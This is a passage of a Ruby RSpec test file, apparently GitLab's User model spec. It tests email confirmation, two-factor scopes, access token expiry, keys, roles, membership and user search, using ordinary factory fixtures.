expect(user.read_attribute(:commit_email)).to eq(Gitlab::PrivateCommitEmail::TOKEN)
end
it 'keeps the commit email when nil' do
user = create(:user, commit_email: nil)
expect(user.read_attribute(:commit_email)).to be_nil
end
it 'reverts to nil when email is not verified' do
user = create(:user, commit_email: "[email protected]")
expect(user.read_attribute(:commit_email)).to be_nil
end
end
context 'owns_commit_email' do
it 'accepts private commit email' do
user = build(:user, commit_email: Gitlab::PrivateCommitEmail::TOKEN)
expect(user).to be_valid
end
it 'accepts nil commit email' do
user = build(:user, commit_email: nil)
expect(user).to be_valid
end
end
end
end
describe "scopes" do
describe ".with_two_factor" do
it "returns users with 2fa enabled via OTP" do
user_with_2fa = create(:user, :two_factor_via_otp)
user_without_2fa = create(:user)
users_with_two_factor = described_class.with_two_factor.pluck(:id)
expect(users_with_two_factor).to include(user_with_2fa.id)
expect(users_with_two_factor).not_to include(user_without_2fa.id)
end
it "returns users with 2fa enabled via U2F" do
user_with_2fa = create(:user, :two_factor_via_u2f)
user_without_2fa = create(:user)
users_with_two_factor = described_class.with_two_factor.pluck(:id)
expect(users_with_two_factor).to include(user_with_2fa.id)
expect(users_with_two_factor).not_to include(user_without_2fa.id)
end
it "returns users with 2fa enabled via OTP and U2F" do
user_with_2fa = create(:user, :two_factor_via_otp, :two_factor_via_u2f)
user_without_2fa = create(:user)
users_with_two_factor = described_class.with_two_factor.pluck(:id)
expect(users_with_two_factor).to eq([user_with_2fa.id])
expect(users_with_two_factor).not_to include(user_without_2fa.id)
end
it 'works with ORDER BY' do
user_with_2fa = create(:user, :two_factor_via_otp, :two_factor_via_u2f)
expect(described_class
.with_two_factor
.reorder_by_name).to eq([user_with_2fa])
end
end
describe ".without_two_factor" do
it "excludes users with 2fa enabled via OTP" do
user_with_2fa = create(:user, :two_factor_via_otp)
user_without_2fa = create(:user)
users_without_two_factor = described_class.without_two_factor.pluck(:id)
expect(users_without_two_factor).to include(user_without_2fa.id)
expect(users_without_two_factor).not_to include(user_with_2fa.id)
end
it "excludes users with 2fa enabled via U2F" do
user_with_2fa = create(:user, :two_factor_via_u2f)
user_without_2fa = create(:user)
users_without_two_factor = described_class.without_two_factor.pluck(:id)
expect(users_without_two_factor).to include(user_without_2fa.id)
expect(users_without_two_factor).not_to include(user_with_2fa.id)
end
it "excludes users with 2fa enabled via OTP and U2F" do
user_with_2fa = create(:user, :two_factor_via_otp, :two_factor_via_u2f)
user_without_2fa = create(:user)
users_without_two_factor = described_class.without_two_factor.pluck(:id)
expect(users_without_two_factor).to include(user_without_2fa.id)
expect(users_without_two_factor).not_to include(user_with_2fa.id)
end
end
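# .random_password is expected to honour the configured password length; with the
# range stubbed to 88..128 below, the generated password should use the maximum.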
describe '.random_password' do
let(:random_password) { described_class.random_password }
before do
expect(User).to receive(:password_length).and_return(88..128)
end
context 'length' do
it 'conforms to the current password length settings' do
expect(random_password.length).to eq(128)
end
end
end
describe '.password_length' do
let(:password_length) { described_class.password_length }
it 'is expected to be a Range' do
expect(password_length).to be_a(Range)
end
context 'minimum value' do
before do
stub_application_setting(minimum_password_length: 101)
end
it 'is determined by the current value of `minimum_password_length` attribute of application_setting' do
expect(password_length.min).to eq(101)
end
end
context 'maximum value' do
before do
allow(Devise.password_length).to receive(:max).and_return(201)
end
it 'is determined by the current value of `Devise.password_length.max`' do
expect(password_length.max).to eq(201)
end
end
end
describe '.limit_to_todo_authors' do
context 'when filtering by todo authors' do
let(:user1) { create(:user) }
let(:user2) { create(:user) }
before do
create(:todo, user: user1, author: user1, state: :done)
create(:todo, user: user2, author: user2, state: :pending)
end
it 'only returns users that have authored todos' do
users = described_class.limit_to_todo_authors(
user: user2,
with_todos: true,
todo_state: :pending
)
expect(users).to eq([user2])
end
it 'ignores users that do not have a todo in the matching state' do
users = described_class.limit_to_todo_authors(
user: user1,
with_todos: true,
todo_state: :pending
)
expect(users).to be_empty
end
end
context 'when not filtering by todo authors' do
it 'returns the input relation' do
user1 = create(:user)
user2 = create(:user)
rel = described_class.limit_to_todo_authors(user: user1)
expect(rel).to include(user1, user2)
end
end
context 'when no user is provided' do
it 'returns the input relation' do
user1 = create(:user)
user2 = create(:user)
rel = described_class.limit_to_todo_authors
expect(rel).to include(user1, user2)
end
end
end
describe '.by_username' do
it 'finds users regardless of the case passed' do
user = create(:user, username: 'CaMeLcAsEd')
user2 = create(:user, username: 'UPPERCASE')
expect(described_class.by_username(%w(CAMELCASED uppercase)))
.to contain_exactly(user, user2)
end
it 'finds a single user regardless of the case passed' do
user = create(:user, username: 'CaMeLcAsEd')
expect(described_class.by_username('CAMELCASED'))
.to contain_exactly(user)
end
end
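# Only user2 holds active tokens that have not yet triggered an expiry notification;
# user1's tokens are expired or revoked and user3 has none, so user2 is the only
# expected match once `from` reaches the 2-day expiry window.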
describe '.with_expiring_and_not_notified_personal_access_tokens' do
let_it_be(:user1) { create(:user) }
let_it_be(:user2) { create(:user) }
let_it_be(:user3) { create(:user) }
let_it_be(:expired_token) { create(:personal_access_token, user: user1, expires_at: 2.days.ago) }
let_it_be(:revoked_token) { create(:personal_access_token, user: user1, revoked: true) }
let_it_be(:valid_token_and_notified) { create(:personal_access_token, user: user2, expires_at: 2.days.from_now, expire_notification_delivered: true) }
let_it_be(:valid_token1) { create(:personal_access_token, user: user2, expires_at: 2.days.from_now) }
let_it_be(:valid_token2) { create(:personal_access_token, user: user2, expires_at: 2.days.from_now) }
let(:users) { described_class.with_expiring_and_not_notified_personal_access_tokens(from) }
context 'in one day' do
let(:from) { 1.day.from_now }
it "doesn't include an user" do
expect(users).to be_empty
end
end
context 'in three days' do
let(:from) { 3.days.from_now }
it 'only includes user2' do
expect(users).to contain_exactly(user2)
end
end
end
describe '.active_without_ghosts' do
let_it_be(:user1) { create(:user, :external) }
let_it_be(:user2) { create(:user, state: 'blocked') }
let_it_be(:user3) { create(:user, :ghost) }
let_it_be(:user4) { create(:user) }
it 'returns all active users but ghost users' do
expect(described_class.active_without_ghosts).to match_array([user1, user4])
end
end
describe '.without_ghosts' do
let_it_be(:user1) { create(:user, :external) }
let_it_be(:user2) { create(:user, state: 'blocked') }
let_it_be(:user3) { create(:user, :ghost) }
it 'returns users without ghost users' do
expect(described_class.without_ghosts).to match_array([user1, user2])
end
end
end
describe "Respond to" do
it { is_expected.to respond_to(:admin?) }
it { is_expected.to respond_to(:name) }
it { is_expected.to respond_to(:external?) }
end
describe 'before save hook' do
describe '#default_private_profile_to_false' do
let(:user) { create(:user, private_profile: true) }
it 'converts nil to false' do
user.private_profile = nil
user.save!
expect(user.private_profile).to eq false
end
end
context 'when saving an external user' do
let(:user) { create(:user) }
let(:external_user) { create(:user, external: true) }
it "sets other properties aswell" do
expect(external_user.can_create_team).to be_falsey
expect(external_user.can_create_group).to be_falsey
expect(external_user.projects_limit).to be 0
end
end
describe '#check_for_verified_email' do
let(:user) { create(:user) }
let(:secondary) { create(:email, :confirmed, email: '[email protected]', user: user) }
it 'allows a verified secondary email to be used as the primary without needing reconfirmation' do
user.update!(email: secondary.email)
user.reload
expect(user.email).to eq secondary.email
expect(user.unconfirmed_email).to eq nil
expect(user.confirmed?).to be_truthy
end
end
end
describe 'after commit hook' do
describe '#update_emails_with_primary_email' do
before do
@user = create(:user, email: '[email protected]').tap do |user|
user.skip_reconfirmation!
end
@secondary = create :email, email: '[email protected]', user: @user
@user.reload
end
it 'gets called when email updated' do
expect(@user).to receive(:update_emails_with_primary_email)
@user.update!(email: '[email protected]')
end
it 'adds old primary to secondary emails when secondary is a new email' do
@user.update!(email: '[email protected]')
@user.reload
expect(@user.emails.count).to eq 2
expect(@user.emails.pluck(:email)).to match_array([@secondary.email, '[email protected]'])
end
it 'adds old primary to secondary emails if secondary is becoming a primary' do
@user.update!(email: @secondary.email)
@user.reload
expect(@user.emails.count).to eq 1
expect(@user.emails.first.email).to eq '[email protected]'
end
it 'transfers old confirmation values into new secondary' do
@user.update!(email: @secondary.email)
@user.reload
expect(@user.emails.count).to eq 1
expect(@user.emails.first.confirmed_at).not_to eq nil
end
context 'when the first email was unconfirmed and the second email gets confirmed' do
let(:user) { create(:user, :unconfirmed, email: '[email protected]') }
before do
user.update!(email: '[email protected]')
user.confirm
end
it 'updates user.email' do
expect(user.email).to eq('[email protected]')
end
it 'confirms user.email' do
expect(user).to be_confirmed
end
it 'keeps the unconfirmed email unconfirmed' do
email = user.emails.first
expect(email.email).to eq('[email protected]')
expect(email).not_to be_confirmed
end
it 'has only one email association' do
expect(user.emails.size).to be(1)
end
end
end
context 'when an existing email record is set as primary' do
let(:user) { create(:user, email: '[email protected]') }
context 'when it is unconfirmed' do
let(:originally_unconfirmed_email) { '[email protected]' }
before do
user.emails << create(:email, email: originally_unconfirmed_email, confirmed_at: nil)
user.update!(email: originally_unconfirmed_email)
end
it 'keeps the user confirmed' do
expect(user).to be_confirmed
end
it 'keeps the original email' do
expect(user.email).to eq('[email protected]')
end
context 'when the email gets confirmed' do
before do
user.confirm
end
it 'keeps the user confirmed' do
expect(user).to be_confirmed
end
it 'updates the email' do
expect(user.email).to eq(originally_unconfirmed_email)
end
end
end
context 'when it is confirmed' do
let!(:old_confirmed_email) { user.email }
let(:confirmed_email) { '[email protected]' }
before do
user.emails << create(:email, :confirmed, email: confirmed_email)
user.update!(email: confirmed_email)
end
it 'keeps the user confirmed' do
expect(user).to be_confirmed
end
it 'updates the email' do
expect(user.email).to eq(confirmed_email)
end
it 'moves the old email' do
email = user.reload.emails.first
expect(email.email).to eq(old_confirmed_email)
expect(email).to be_confirmed
end
end
end
context 'when unconfirmed user deletes a confirmed additional email' do
let(:user) { create(:user, :unconfirmed) }
before do
user.emails << create(:email, :confirmed)
end
it 'does not affect the confirmed status' do
expect { user.emails.confirmed.destroy_all }.not_to change { user.confirmed? } # rubocop: disable Cop/DestroyAll
end
end
describe '#update_notification_email' do
# Regression: https://gitlab.com/gitlab-org/gitlab-foss/issues/22846
context 'when changing :email' do
let(:user) { create(:user) }
let(:new_email) { '[email protected]' }
it 'sets :unconfirmed_email' do
expect do
user.tap { |u| u.update!(email: new_email) }.reload
end.to change(user, :unconfirmed_email).to(new_email)
end
it 'does not change :notification_email' do
expect do
user.tap { |u| u.update!(email: new_email) }.reload
end.not_to change(user, :notification_email)
end
it 'updates :notification_email to the new email once confirmed' do
user.update!(email: new_email)
expect do
user.tap(&:confirm).reload
end.to change(user, :notification_email).to eq(new_email)
end
context 'and :notification_email is set to a secondary email' do
let!(:email_attrs) { attributes_for(:email, :confirmed, user: user) }
let(:secondary) { create(:email, :confirmed, email: '[email protected]', user: user) }
before do
user.emails.create(email_attrs)
user.tap { |u| u.update!(notification_email: email_attrs[:email]) }.reload
end
it 'does not change :notification_email to :email' do
expect do
user.tap { |u| u.update!(email: new_email) }.reload
end.not_to change(user, :notification_email)
end
it 'does not change :notification_email to :email once confirmed' do
user.update!(email: new_email)
expect do
user.tap(&:confirm).reload
end.not_to change(user, :notification_email)
end
end
end
end
describe '#update_invalid_gpg_signatures' do
let(:user) do
create(:user, email: '[email protected]').tap do |user|
user.skip_reconfirmation!
end
end
it 'does nothing when the name is updated' do
expect(user).not_to receive(:update_invalid_gpg_signatures)
user.update!(name: 'Bette')
end
it 'synchronizes the gpg keys when the email is updated' do
expect(user).to receive(:update_invalid_gpg_signatures).at_most(:twice)
user.update!(email: '[email protected]')
end
end
end
describe 'name getters' do
let(:user) { create(:user, name: 'Kane Martin William') }
it 'derives first name from full name, if not present' do
expect(user.first_name).to eq('Kane')
end
it 'derives last name from full name, if not present' do
expect(user.last_name).to eq('Martin William')
end
end
describe '#highest_role' do
let_it_be(:user) { create(:user) }
context 'when user_highest_role does not exist' do
it 'returns NO_ACCESS' do
expect(user.highest_role).to eq(Gitlab::Access::NO_ACCESS)
end
end
context 'when user_highest_role exists' do
context 'stored highest access level is nil' do
it 'returns Gitlab::Access::NO_ACCESS' do
create(:user_highest_role, user: user)
expect(user.highest_role).to eq(Gitlab::Access::NO_ACCESS)
end
end
context 'stored highest access level present' do
context 'with association :user_highest_role' do
let(:another_user) { create(:user) }
before do
create(:user_highest_role, :maintainer, user: user)
create(:user_highest_role, :developer, user: another_user)
end
it 'returns the correct highest role' do
users = User.includes(:user_highest_role).where(id: [user.id, another_user.id])
expect(users.collect { |u| [u.id, u.highest_role] }).to contain_exactly(
[user.id, Gitlab::Access::MAINTAINER],
[another_user.id, Gitlab::Access::DEVELOPER]
)
end
end
end
end
end
describe '#update_tracked_fields!', :clean_gitlab_redis_shared_state do
let(:request) { OpenStruct.new(remote_ip: "127.0.0.1") }
let(:user) { create(:user) }
it 'writes trackable attributes' do
expect do
user.update_tracked_fields!(request)
end.to change { user.reload.current_sign_in_at }
end
it 'does not write trackable attributes when called a second time within the hour' do
user.update_tracked_fields!(request)
expect do
user.update_tracked_fields!(request)
end.not_to change { user.reload.current_sign_in_at }
end
it 'writes trackable attributes for a different user' do
user2 = create(:user)
user.update_tracked_fields!(request)
expect do
user2.update_tracked_fields!(request)
end.to change { user2.reload.current_sign_in_at }
end
it 'does not write if the DB is in read-only mode' do
expect(Gitlab::Database).to receive(:read_only?).and_return(true)
expect do
user.update_tracked_fields!(request)
end.not_to change { user.reload.current_sign_in_at }
end
end
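# Shared setup for the #keys and #deploy_keys examples below: the same user owns
# one regular SSH key and one deploy key, so each association can be checked for
# excluding the other kind.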
shared_context 'user keys' do
let(:user) { create(:user) }
let!(:key) { create(:key, user: user) }
let!(:deploy_key) { create(:deploy_key, user: user) }
end
describe '#keys' do
include_context 'user keys'
context 'with key and deploy key stored' do
it 'returns stored key, but not deploy_key' do
expect(user.keys).to include key
expect(user.keys).not_to include deploy_key
end
end
end
describe '#accessible_deploy_keys' do
let(:user) { create(:user) }
let(:project) { create(:project) }
let!(:private_deploy_keys_project) { create(:deploy_keys_project) }
let!(:public_deploy_keys_project) { create(:deploy_keys_project) }
let!(:accessible_deploy_keys_project) { create(:deploy_keys_project, project: project) }
before do
public_deploy_keys_project.deploy_key.update(public: true)
project.add_developer(user)
end
it 'can only see deploy keys accessible to the right projects' do
expect(user.accessible_deploy_keys).to match_array([public_deploy_keys_project.deploy_key,
accessible_deploy_keys_project.deploy_key])
end
end
describe '#deploy_keys' do
include_context 'user keys'
context 'with key and deploy key stored' do
it 'returns stored deploy key, but not normal key' do
expect(user.deploy_keys).to include deploy_key
expect(user.deploy_keys).not_to include key
end
end
end
describe '#confirm' do
before do
allow_any_instance_of(ApplicationSetting).to receive(:send_user_confirmation_email).and_return(true)
end
let(:user) { create(:user, confirmed_at: nil, unconfirmed_email: '[email protected]') }
it 'returns unconfirmed' do
expect(user.confirmed?).to be_falsey
end
it 'confirms a user' do
user.confirm
expect(user.confirmed?).to be_truthy
end
end
describe '#to_reference' do
let(:user) { create(:user) }
it 'returns a String reference to the object' do
expect(user.to_reference).to eq "@#{user.username}"
end
end
describe '#generate_password' do
it "does not generate password by default" do
user = create(:user, password: 'abcdefghe')
expect(user.password).to eq('abcdefghe')
end
end
describe 'ensure user preference' do
it 'has user preference upon user initialization' do
user = build(:user)
expect(user.user_preference).to be_present
expect(user.user_preference).not_to be_persisted
end
end
describe 'ensure incoming email token' do
it 'has incoming email token' do
user = create(:user)
expect(user.incoming_email_token).not_to be_blank
end
it 'uses SecureRandom to generate the incoming email token' do
allow_next_instance_of(User) do |user|
allow(user).to receive(:update_highest_role)
end
expect(SecureRandom).to receive(:hex).and_return('3b8ca303')
user = create(:user)
expect(user.incoming_email_token).to eql('gitlab')
end
end
describe '#ensure_user_rights_and_limits' do
describe 'with external user' do
let(:user) { create(:user, external: true) }
it 'receives callback when external changes' do
expect(user).to receive(:ensure_user_rights_and_limits)
user.update(external: false)
end
it 'ensures correct rights and limits for user' do
stub_config_setting(default_can_create_group: true)
expect { user.update(external: false) }.to change { user.can_create_group }.to(true)
.and change { user.projects_limit }.to(Gitlab::CurrentSettings.default_projects_limit)
end
end
describe 'without external user' do
let(:user) { create(:user, external: false) }
it 'receives callback when external changes' do
expect(user).to receive(:ensure_user_rights_and_limits)
user.update(external: true)
end
it 'ensures correct rights and limits for user' do
expect { user.update(external: true) }.to change { user.can_create_group }.to(false)
.and change { user.projects_limit }.to(0)
end
end
end
describe 'feed token' do
it 'ensures a feed token on read' do
user = create(:user, feed_token: nil)
feed_token = user.feed_token
expect(feed_token).not_to be_blank
expect(user.reload.feed_token).to eq feed_token
end
end
describe 'static object token' do
it 'ensures a static object token on read' do
user = create(:user, static_object_token: nil)
static_object_token = user.static_object_token
expect(static_object_token).not_to be_blank
expect(user.reload.static_object_token).to eq static_object_token
end
end
describe '#recently_sent_password_reset?' do
it 'is false when reset_password_sent_at is nil' do
user = build_stubbed(:user, reset_password_sent_at: nil)
expect(user.recently_sent_password_reset?).to eq false
end
it 'is false when sent more than one minute ago' do
user = build_stubbed(:user, reset_password_sent_at: 5.minutes.ago)
expect(user.recently_sent_password_reset?).to eq false
end
it 'is true when sent less than one minute ago' do
user = build_stubbed(:user, reset_password_sent_at: Time.now)
expect(user.recently_sent_password_reset?).to eq true
end
end
describe '#disable_two_factor!' do
it 'clears all 2FA-related fields' do
user = create(:user, :two_factor)
expect(user).to be_two_factor_enabled
expect(user.encrypted_otp_secret).not_to be_nil
expect(user.otp_backup_codes).not_to be_nil
expect(user.otp_grace_period_started_at).not_to be_nil
user.disable_two_factor!
expect(user).not_to be_two_factor_enabled
expect(user.encrypted_otp_secret).to be_nil
expect(user.encrypted_otp_secret_iv).to be_nil
expect(user.encrypted_otp_secret_salt).to be_nil
expect(user.otp_backup_codes).to be_nil
expect(user.otp_grace_period_started_at).to be_nil
end
end
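# @project is a personal project under the user's namespace; @project_2 and
# @project_3 are group projects where the user is only a member, so they are
# authorized but neither owned nor personal.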
describe 'projects' do
before do
@user = create(:user)
@project = create(:project, namespace: @user.namespace)
@project_2 = create(:project, group: create(:group)) do |project|
project.add_maintainer(@user)
end
@project_3 = create(:project, group: create(:group)) do |project|
project.add_developer(@user)
end
end
it { expect(@user.authorized_projects).to include(@project) }
it { expect(@user.authorized_projects).to include(@project_2) }
it { expect(@user.authorized_projects).to include(@project_3) }
it { expect(@user.owned_projects).to include(@project) }
it { expect(@user.owned_projects).not_to include(@project_2) }
it { expect(@user.owned_projects).not_to include(@project_3) }
it { expect(@user.personal_projects).to include(@project) }
it { expect(@user.personal_projects).not_to include(@project_2) }
it { expect(@user.personal_projects).not_to include(@project_3) }
end
describe 'groups' do
let(:user) { create(:user) }
let(:group) { create(:group) }
before do
group.add_owner(user)
end
it { expect(user.several_namespaces?).to be_truthy }
it { expect(user.authorized_groups).to eq([group]) }
it { expect(user.owned_groups).to eq([group]) }
it { expect(user.namespaces).to contain_exactly(user.namespace, group) }
it { expect(user.manageable_namespaces).to contain_exactly(user.namespace, group) }
context 'with child groups' do
let!(:subgroup) { create(:group, parent: group) }
describe '#manageable_namespaces' do
it 'includes all the namespaces the user can manage' do
expect(user.manageable_namespaces).to contain_exactly(user.namespace, group, subgroup)
end
end
describe '#manageable_groups' do
it 'includes all the namespaces the user can manage' do
expect(user.manageable_groups).to contain_exactly(group, subgroup)
end
it 'does not include duplicates if a membership was added for the subgroup' do
subgroup.add_owner(user)
expect(user.manageable_groups).to contain_exactly(group, subgroup)
end
end
describe '#manageable_groups_with_routes' do
it 'eager loads routes from manageable groups' do
control_count =
ActiveRecord::QueryRecorder.new(skip_cached: false) do
user.manageable_groups_with_routes.map(&:route)
end.count
create(:group, parent: subgroup)
expect do
user.manageable_groups_with_routes.map(&:route)
end.not_to exceed_all_query_limit(control_count)
end
end
end
end
describe 'group multiple owners' do
before do
@user = create :user
@user2 = create :user
@group = create :group
@group.add_owner(@user)
@group.add_user(@user2, GroupMember::OWNER)
end
it { expect(@user2.several_namespaces?).to be_truthy }
end
describe 'namespaced' do
before do
@user = create :user
@project = create(:project, namespace: @user.namespace)
end
it { expect(@user.several_namespaces?).to be_falsey }
it { expect(@user.namespaces).to eq([@user.namespace]) }
end
describe 'blocking user' do
let(:user) { create(:user, name: 'John Smith') }
it 'blocks user' do
user.block
expect(user.blocked?).to be_truthy
end
context 'when user has running CI pipelines' do
let(:service) { double }
before do
pipeline = create(:ci_pipeline, :running, user: user)
create(:ci_build, :running, pipeline: pipeline)
end
it 'cancels all running pipelines and related jobs' do
expect(Ci::CancelUserPipelinesService).to receive(:new).and_return(service)
expect(service).to receive(:execute).with(user)
user.block
end
end
end
describe 'deactivating a user' do
let(:user) { create(:user, name: 'John Smith') }
context "an active user" do
it "can be deactivated" do
user.deactivate
expect(user.deactivated?).to be_truthy
end
end
context "a user who is blocked" do
before do
user.block
end
it "cannot be deactivated" do
user.deactivate
expect(user.reload.deactivated?).to be_falsy
end
end
end
describe '.filter_items' do
let(:user) { double }
it 'filters by active users by default' do
expect(described_class).to receive(:active_without_ghosts).and_return([user])
expect(described_class.filter_items(nil)).to include user
end
it 'filters by admins' do
expect(described_class).to receive(:admins).and_return([user])
expect(described_class.filter_items('admins')).to include user
end
it 'filters by blocked' do
expect(described_class).to receive(:blocked).and_return([user])
expect(described_class.filter_items('blocked')).to include user
end
it 'filters by deactivated' do
expect(described_class).to receive(:deactivated).and_return([user])
expect(described_class.filter_items('deactivated')).to include user
end
it 'filters by two_factor_disabled' do
expect(described_class).to receive(:without_two_factor).and_return([user])
expect(described_class.filter_items('two_factor_disabled')).to include user
end
it 'filters by two_factor_enabled' do
expect(described_class).to receive(:with_two_factor).and_return([user])
expect(described_class.filter_items('two_factor_enabled')).to include user
end
it 'filters by wop' do
expect(described_class).to receive(:without_projects).and_return([user])
expect(described_class.filter_items('wop')).to include user
end
end
describe '.without_projects' do
let!(:project) { create(:project, :public) }
let!(:user) { create(:user) }
let!(:user_without_project) { create(:user) }
let!(:user_without_project2) { create(:user) }
before do
# add user to project
project.add_maintainer(user)
# create invite to project
create(:project_member, :developer, project: project, invite_token: '1234', invite_email: '[email protected]')
# create request to join project
project.request_access(user_without_project2)
end
it { expect(described_class.without_projects).not_to include user }
it { expect(described_class.without_projects).to include user_without_project }
it { expect(described_class.without_projects).to include user_without_project2 }
end
describe 'user creation' do
describe 'normal user' do
let(:user) { create(:user, name: 'John Smith') }
it { expect(user.admin?).to be_falsey }
it { expect(user.require_ssh_key?).to be_truthy }
it { expect(user.can_create_group?).to be_truthy }
it { expect(user.can_create_project?).to be_truthy }
it { expect(user.first_name).to eq('John') }
it { expect(user.external).to be_falsey }
end
describe 'with defaults' do
let(:user) { described_class.new }
it "applies defaults to user" do
expect(user.projects_limit).to eq(Gitlab.config.gitlab.default_projects_limit)
expect(user.can_create_group).to eq(Gitlab.config.gitlab.default_can_create_group)
expect(user.theme_id).to eq(Gitlab.config.gitlab.default_theme)
expect(user.external).to be_falsey
expect(user.private_profile).to eq(false)
end
end
describe 'with default overrides' do
let(:user) { described_class.new(projects_limit: 123, can_create_group: false, can_create_team: true) }
it "applies defaults to user" do
expect(user.projects_limit).to eq(123)
expect(user.can_create_group).to be_falsey
expect(user.theme_id).to eq(1)
end
it 'does not undo projects_limit setting if it matches old DB default of 10' do
# If the real default project limit is 10 then this test is worthless
expect(Gitlab.config.gitlab.default_projects_limit).not_to eq(10)
user = described_class.new(projects_limit: 10)
expect(user.projects_limit).to eq(10)
end
end
context 'when Gitlab::CurrentSettings.user_default_external is true' do
before do
stub_application_setting(user_default_external: true)
end
it "creates external user by default" do
user = create(:user)
expect(user.external).to be_truthy
expect(user.can_create_group).to be_falsey
expect(user.projects_limit).to be 0
end
describe 'with default overrides' do
it "creates a non-external user" do
user = create(:user, external: false)
expect(user.external).to be_falsey
end
end
end
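# require_ssh_key? depends on the enabled Git access protocol: SSH keys are needed
# unless HTTP(S) is the only allowed protocol, and never once the user has a key.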
describe '#require_ssh_key?', :use_clean_rails_memory_store_caching do
protocol_and_expectation = {
'http' => false,
'ssh' => true,
'' => true
}
protocol_and_expectation.each do |protocol, expected|
it "has correct require_ssh_key?" do
stub_application_setting(enabled_git_access_protocol: protocol)
user = build(:user)
expect(user.require_ssh_key?).to eq(expected)
end
end
it 'returns false when the user has 1 or more SSH keys' do
key = create(:personal_key)
expect(key.user.require_ssh_key?).to eq(false)
end
end
end
describe '.find_for_database_authentication' do
it 'strips whitespace from login' do
user = create(:user)
expect(described_class.find_for_database_authentication({ login: " #{user.username} " })).to eq user
end
end
describe '.find_by_any_email' do
it 'finds user through private commit email' do
user = create(:user)
private_email = user.private_commit_email
expect(described_class.find_by_any_email(private_email)).to eq(user)
expect(described_class.find_by_any_email(private_email, confirmed: true)).to eq(user)
end
it 'finds by primary email' do
user = create(:user, email: '[email protected]')
expect(described_class.find_by_any_email(user.email)).to eq user
expect(described_class.find_by_any_email(user.email, confirmed: true)).to eq user
end
it 'finds by uppercased email' do
user = create(:user, email: '[email protected]')
expect(described_class.find_by_any_email(user.email.upcase)).to eq user
expect(described_class.find_by_any_email(user.email.upcase, confirmed: true)).to eq user
end
context 'finds by secondary email' do
let(:user) { email.user }
context 'primary email confirmed' do
context 'secondary email confirmed' do
let!(:email) { create(:email, :confirmed, email: '[email protected]') }
it 'finds user respecting the confirmed flag' do
expect(described_class.find_by_any_email(email.email)).to eq user
expect(described_class.find_by_any_email(email.email, confirmed: true)).to eq user
end
end
context 'secondary email not confirmed' do
let!(:email) { create(:email, email: '[email protected]') }
it 'finds user respecting the confirmed flag' do
expect(described_class.find_by_any_email(email.email)).to eq user
expect(described_class.find_by_any_email(email.email, confirmed: true)).to be_nil
end
end
end
context 'primary email not confirmed' do
let(:user) { create(:user, confirmed_at: nil) }
let!(:email) { create(:email, :confirmed, user: user, email: '[email protected]') }
it 'finds user respecting the confirmed flag' do
expect(described_class.find_by_any_email(email.email)).to eq user
expect(described_class.find_by_any_email(email.email, confirmed: true)).to be_nil
end
end
end
it 'returns nil when nothing found' do
expect(described_class.find_by_any_email('')).to be_nil
end
it 'returns nil when user is not confirmed' do
user = create(:user, email: '[email protected]', confirmed_at: nil)
expect(described_class.find_by_any_email(user.email, confirmed: false)).to eq(user)
expect(described_class.find_by_any_email(user.email, confirmed: true)).to be_nil
end
end
describe '.by_any_email' do
it 'returns an ActiveRecord::Relation' do
expect(described_class.by_any_email('[email protected]'))
.to be_a_kind_of(ActiveRecord::Relation)
end
it 'returns a relation of users' do
user = create(:user)
expect(described_class.by_any_email(user.email)).to eq([user])
end
it 'returns a relation of users for confirmed users' do
user = create(:user)
expect(described_class.by_any_email(user.email, confirmed: true)).to eq([user])
end
it 'finds user through a private commit email' do
user = create(:user)
private_email = user.private_commit_email
expect(described_class.by_any_email(private_email)).to eq([user])
expect(described_class.by_any_email(private_email, confirmed: true)).to eq([user])
end
it 'finds user through a private commit email in an array' do
user = create(:user)
private_email = user.private_commit_email
expect(described_class.by_any_email([private_email])).to eq([user])
expect(described_class.by_any_email([private_email], confirmed: true)).to eq([user])
end
end
describe '.search' do
let!(:user) { create(:user, name: 'user', username: 'usern', email: '[email protected]') }
let!(:user2) { create(:user, name: 'user name', username: 'username', email: '[email protected]') }
let!(:user3) { create(:user, name: 'us', username: 'se', email: '[email protected]') }
describe 'name matching' do
it 'returns users with a matching name with exact match first' do
expect(described_class.search(user.name)).to eq([user, user2])
end
it 'returns users with a partially matching name' do
expect(described_class.search(user.name[0..2])).to eq([user, user2])
end
it 'returns users with a matching name regardless of the casing' do
expect(described_class.search(user2.name.upcase)).to eq([user2])
end
it 'returns users with an exactly matching name shorter than 3 chars' do
expect(described_class.search(user3.name)).to eq([user3])
end
it 'returns users with an exactly matching name shorter than 3 chars regardless of the casing' do
expect(described_class.search(user3.name.upcase)).to eq([user3])
end
end
describe 'email matching' do
it 'returns users with a matching Email' do
expect(described_class.search(user.email)).to eq([user])
end
it 'does not return users with a partially matching Email' do
expect(described_class.search(user.email[0..2])).not_to include(user, user2)
end
it 'returns users with a matching Email regardless of the casing' do
expect(described_class.search(user2.email.upcase)).to eq([user2])
end
end
describe 'username matching' do
it 'returns users with a matching username' do
expect(described_class.search(user.username)).to eq([user, user2])
end
it 'returns users with a matching username starting with a @' do
expect(described_class.search("@#{user.username}")).to eq([user, user2])
end
it 'returns users with a partially matching username' do
expect(described_class.search(user.username[0..2])).to eq([user, user2])
end
it 'returns users with a partially matching username starting with @' do
expect(described_class.search("@#{user.username[0..2]}")).to eq([user, user2])
end
it 'returns users with a matching username regardless of the casing' do
expect(described_class.search(user2.username.upcase)).to eq([user2])
end
it 'returns users with an exactly matching username shorter than 3 chars' do
expect(described_class.search(user3.username)).to eq([user3])
end
it 'returns users with an exactly matching username shorter than 3 chars regardless of the casing' do
expect(described_class.search(user3.username.upcase)).to eq([user3])
end
end
it 'returns no matches for an empty string' do
expect(described_class.search('')).to be_empty
end
it 'returns no matches for nil' do
expect(described_class.search(nil)).to be_empty
end
end
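# .search_with_secondary_emails matches on name, username, primary email and whole
# secondary emails, but never on partial email addresses.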
describe '.search_with_secondary_emails' do
delegate :search_with_secondary_emails, to: :described_class
let!(:user) { create(:user, name: 'John Doe', username: 'john.doe', email: '[email protected]' ) }
let!(:another_user) { create(:user, name: 'Albert Smith', username: 'albert.smith', email: '[email protected]' ) }
let!(:email) do
create(:email, user: another_user, email: '[email protected]')
end
it 'returns users with a matching name' do
expect(search_with_secondary_emails(user.name)).to eq([user])
end
it 'returns users with a partially matching name' do
expect(search_with_secondary_emails(user.name[0..2])).to eq([user])
end
it 'returns users with a matching name regardless of the casing' do
expect(search_with_secondary_emails(user.name.upcase)).to eq([user])
end
it 'returns users with a matching email' do
expect(search_with_secondary_emails(user.email)).to eq([user])
end
it 'does not return users with a partially matching email' do
expect(search_with_secondary_emails(user.email[0..2])).not_to include([user])
end
it 'returns users with a matching email regardless of the casing' do
expect(search_with_secondary_emails(user.email.upcase)).to eq([user])
end
